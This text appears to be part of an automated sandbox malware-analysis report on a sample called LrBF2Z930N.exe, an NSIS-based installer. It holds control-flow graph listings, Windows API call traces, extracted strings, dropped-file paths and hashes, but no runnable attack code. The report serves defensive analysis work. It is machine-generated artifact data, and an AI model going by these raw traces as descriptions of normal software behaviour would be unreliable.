                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\LrBF2Z930N.exe"$POB$\*.*
                                                                                      • API String ID: 2035342205-4042356965
                                                                                      • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                                      • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                                                      • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                                      • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 678 406da0-406da5 679 406e16-406e34 678->679 680 406da7-406dd6 678->680 683 40740c-407421 679->683 681 406dd8-406ddb 680->681 682 406ddd-406de1 680->682 684 406ded-406df0 681->684 685 406de3-406de7 682->685 686 406de9 682->686 687 407423-407439 683->687 688 40743b-407451 683->688 690 406df2-406dfb 684->690 691 406e0e-406e11 684->691 685->684 686->684 689 407454-40745b 687->689 688->689 692 407482-40748e 689->692 693 40745d-407461 689->693 694 406e00-406e0c 690->694 695 406dfd 690->695 696 406fe3-407001 691->696 706 406c24-406c2d 692->706 697 407610-40761a 693->697 698 407467-40747f 693->698 702 406e76-406ea4 694->702 695->694 700 407003-407017 696->700 701 407019-40702b 696->701 705 407626-407639 697->705 698->692 707 40702e-407038 700->707 701->707 703 406ec0-406eda 702->703 704 406ea6-406ebe 702->704 708 406edd-406ee7 703->708 704->708 713 40763e-407642 705->713 709 406c33 706->709 710 40763b 706->710 711 40703a 707->711 712 406fdb-406fe1 707->712 715 406eed 708->715 716 406e5e-406e64 708->716 717 406c3a-406c3e 709->717 718 406d7a-406d9b 709->718 719 406cdf-406ce3 709->719 720 406d4f-406d53 709->720 710->713 721 406fb6-406fba 711->721 722 40714b-407158 711->722 712->696 714 406f7f-406f89 712->714 729 4075ce-4075d8 714->729 730 406f8f-406fb1 714->730 740 406e43-406e5b 715->740 741 4075aa-4075b4 715->741 731 406f17-406f1d 716->731 732 406e6a-406e70 716->732 717->705 726 406c44-406c51 717->726 718->683 733 406ce9-406d02 719->733 734 40758f-407599 719->734 727 406d59-406d6d 720->727 728 40759e-4075a8 720->728 723 406fc0-406fd8 721->723 724 4075c2-4075cc 721->724 722->706 723->712 724->705 726->710 736 406c57-406c9d 726->736 739 406d70-406d78 727->739 728->705 729->705 730->722 737 406f7b 731->737 738 406f1f-406f3d 731->738 732->702 732->737 735 406d05-406d09 733->735 734->705 735->719 742 406d0b-406d11 735->742 743 406cc5-406cc7 736->743 744 406c9f-406ca3 736->744 737->714 745 406f55-406f67 738->745 746 406f3f-406f53 738->746 739->718 739->720 740->716 741->705 747 406d13-406d1a 742->747 748 406d3b-406d4d 742->748 752 406cd5-406cdd 743->752 753 406cc9-406cd3 743->753 749 406ca5-406ca8 GlobalFree 744->749 750 406cae-406cbc GlobalAlloc 744->750 751 406f6a-406f74 745->751 746->751 754 406d25-406d35 GlobalAlloc 747->754 755 406d1c-406d1f GlobalFree 747->755 748->739 749->750 750->710 756 406cc2 750->756 751->731 757 406f76 751->757 752->735 753->752 753->753 754->710 754->748 755->754 756->743 759 4075b6-4075c0 757->759 760 406efc-406f14 757->760 759->705 760->731
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                                      • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                                                      • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                                      • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
                                                                                      • FindClose.KERNEL32(00000000), ref: 004069F6
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\nsk82C6.tmp, xrefs: 004069DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsk82C6.tmp
                                                                                      • API String ID: 2295610775-487429065
                                                                                      • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                                      • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                                                      • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                                      • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 151 403d54-403d6c call 406a76 154 403d80-403db7 call 406550 151->154 155 403d6e-403d7e call 4065c9 151->155 159 403db9-403dca call 406550 154->159 160 403dcf-403dd5 lstrcatW 154->160 163 403dda-403e03 call 40402a call 406059 155->163 159->160 160->163 169 403e95-403e9d call 406059 163->169 170 403e09-403e0e 163->170 176 403eab-403ed0 LoadImageW 169->176 177 403e9f-403ea6 call 4066bf 169->177 170->169 171 403e14-403e3c call 406550 170->171 171->169 181 403e3e-403e42 171->181 179 403f51-403f59 call 40140b 176->179 180 403ed2-403f02 RegisterClassW 176->180 177->176 194 403f63-403f6e call 40402a 179->194 195 403f5b-403f5e 179->195 182 404020 180->182 183 403f08-403f4c SystemParametersInfoW CreateWindowExW 180->183 185 403e54-403e60 lstrlenW 181->185 186 403e44-403e51 call 405f7e 181->186 188 404022-404029 182->188 183->179 189 403e62-403e70 lstrcmpiW 185->189 190 403e88-403e90 call 405f51 call 406682 185->190 186->185 189->190 193 403e72-403e7c GetFileAttributesW 189->193 190->169 197 403e82-403e83 call 405f9d 193->197 198 403e7e-403e80 193->198 204 403f74-403f8e ShowWindow call 406a06 194->204 205 403ff7-403fff call 4057da 194->205 195->188 197->190 198->190 198->197 212 403f90-403f95 call 406a06 204->212 213 403f9a-403fac GetClassInfoW 204->213 210 404001-404007 205->210 211 404019-40401b call 40140b 205->211 210->195 216 40400d-404014 call 40140b 210->216 211->182 212->213 214 403fc4-403ff5 DialogBoxParamW call 40140b call 403ca4 213->214 215 403fae-403fbe GetClassInfoW RegisterClassW 213->215 214->188 215->214 216->195
                                                                                      APIs
                                                                                        • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                                        • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                                      • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\LrBF2Z930N.exe",00008001), ref: 00403DD5
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420), ref: 00403E55
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403E73
                                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\eftermodnendes\ringeagt), ref: 00403EBC
                                                                                        • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                                      • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                                                      • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                                                      • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\LrBF2Z930N.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\eftermodnendes\ringeagt$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 1975747703-2360237316
                                                                                      • Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                                      • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                                                      • Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                                      • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 225 4030d5-403123 GetTickCount GetModuleFileNameW call 406172 228 403125-40312a 225->228 229 40312f-40315d call 406682 call 405f9d call 406682 GetFileSize 225->229 230 40336f-403373 228->230 237 403163 229->237 238 403248-403256 call 403033 229->238 240 403168-40317f 237->240 244 403327-40332c 238->244 245 40325c-40325f 238->245 242 403181 240->242 243 403183-40318c call 4035e7 240->243 242->243 250 403192-403199 243->250 251 4032e3-4032eb call 403033 243->251 244->230 248 403261-403279 call 4035fd call 4035e7 245->248 249 40328b-4032d7 GlobalAlloc call 406bd1 call 4061a1 CreateFileW 245->249 248->244 272 40327f-403285 248->272 276 4032d9-4032de 249->276 277 4032ed-40331d call 4035fd call 403376 249->277 254 403215-403219 250->254 255 40319b-4031af call 40612d 250->255 251->244 262 403223-403229 254->262 263 40321b-403222 call 403033 254->263 255->262 274 4031b1-4031b8 255->274 267 403238-403240 262->267 268 40322b-403235 call 406b63 262->268 263->262 267->240 275 403246 267->275 268->267 272->244 272->249 274->262 279 4031ba-4031c1 274->279 275->238 276->230 286 403322-403325 277->286 279->262 281 4031c3-4031ca 279->281 281->262 283 4031cc-4031d3 281->283 283->262 285 4031d5-4031f5 283->285 285->244 288 4031fb-4031ff 285->288 286->244 287 40332e-40333f 286->287 289 403341 287->289 290 403347-40334c 287->290 291 403201-403205 288->291 292 403207-40320f 288->292 289->290 293 40334d-403353 290->293 291->275 291->292 292->262 294 403211-403213 292->294 293->293 295 403355-40336d call 40612d 293->295 294->262 295->230
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 004030E9
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LrBF2Z930N.exe,00000400), ref: 00403105
                                                                                        • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\LrBF2Z930N.exe,80000000,00000003), ref: 00406176
                                                                                        • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LrBF2Z930N.exe,C:\Users\user\Desktop\LrBF2Z930N.exe,80000000,00000003), ref: 0040314E
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\LrBF2Z930N.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\LrBF2Z930N.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 2803837635-479715513
                                                                                      • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                                      • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                                                      • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                                      • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 298 4066bf-4066c8 299 4066ca-4066d9 298->299 300 4066db-4066f5 298->300 299->300 301 406905-40690b 300->301 302 4066fb-406707 300->302 304 406911-40691e 301->304 305 406719-406726 301->305 302->301 303 40670d-406714 302->303 303->301 307 406920-406925 call 406682 304->307 308 40692a-40692d 304->308 305->304 306 40672c-406735 305->306 309 4068f2 306->309 310 40673b-40677e 306->310 307->308 312 406900-406903 309->312 313 4068f4-4068fe 309->313 314 406784-406790 310->314 315 406896-40689a 310->315 312->301 313->301 316 406792 314->316 317 40679a-40679c 314->317 318 40689c-4068a3 315->318 319 4068ce-4068d2 315->319 316->317 324 4067d6-4067d9 317->324 325 40679e-4067c4 call 406550 317->325 322 4068b3-4068bf call 406682 318->322 323 4068a5-4068b1 call 4065c9 318->323 320 4068e2-4068f0 lstrlenW 319->320 321 4068d4-4068dd call 4066bf 319->321 320->301 321->320 337 4068c4-4068ca 322->337 323->337 326 4067db-4067e7 GetSystemDirectoryW 324->326 327 4067ec-4067ef 324->327 340 40687e-406881 325->340 342 4067ca-4067d1 call 4066bf 325->342 332 406879-40687c 326->332 333 406801-406805 327->333 334 4067f1-4067fd GetWindowsDirectoryW 327->334 339 40688e-406894 call 406930 332->339 332->340 333->332 341 406807-406825 333->341 334->333 337->320 338 4068cc 337->338 338->339 339->320 340->339 343 406883-406889 lstrcatW 340->343 345 406827-40682d 341->345 346 406839-406851 call 406a76 341->346 342->332 343->339 351 406835-406837 345->351 355 406853-406866 SHGetPathFromIDListW CoTaskMemFree 346->355 356 406868-406871 346->356 351->346 353 406873-406877 351->353 353->332 355->353 355->356 356->341 356->353
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E1
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406855
                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406889
                                                                                      • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                                                      • API String ID: 4024019347-3319343437
                                                                                      • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                                      • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                                                      • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                                      • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 421 401774-401799 call 402dab call 405fc8 426 4017a3-4017b5 call 406682 call 405f51 lstrcatW 421->426 427 40179b-4017a1 call 406682 421->427 433 4017ba-4017bb call 406930 426->433 427->433 436 4017c0-4017c4 433->436 437 4017c6-4017d0 call 4069df 436->437 438 4017f7-4017fa 436->438 445 4017e2-4017f4 437->445 446 4017d2-4017e0 CompareFileTime 437->446 440 401802-40181e call 406172 438->440 441 4017fc-4017fd call 40614d 438->441 448 401820-401823 440->448 449 401892-4018bb call 405707 call 403376 440->449 441->440 445->438 446->445 450 401874-40187e call 405707 448->450 451 401825-401863 call 406682 * 2 call 4066bf call 406682 call 405ce2 448->451 463 4018c3-4018cf SetFileTime 449->463 464 4018bd-4018c1 449->464 461 401887-40188d 450->461 451->436 485 401869-40186a 451->485 465 402c38 461->465 467 4018d5-4018e0 CloseHandle 463->467 464->463 464->467 468 402c3a-402c3e 465->468 470 4018e6-4018e9 467->470 471 402c2f-402c32 467->471 473 4018eb-4018fc call 4066bf lstrcatW 470->473 474 4018fe-401901 call 4066bf 470->474 471->465 478 401906-40239d 473->478 474->478 483 4023a2-4023a7 478->483 484 40239d call 405ce2 478->484 483->468 484->483 485->461 486 40186c-40186d 485->486 486->450
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017B5
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017DA
                                                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsk82C6.tmp$C:\Users\user\AppData\Local\Temp\nsk82C6.tmp\System.dll$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Call
                                                                                      • API String ID: 1941528284-1676611740
                                                                                      • Opcode ID: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                                      • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                                                      • Opcode Fuzzy Hash: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                                      • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
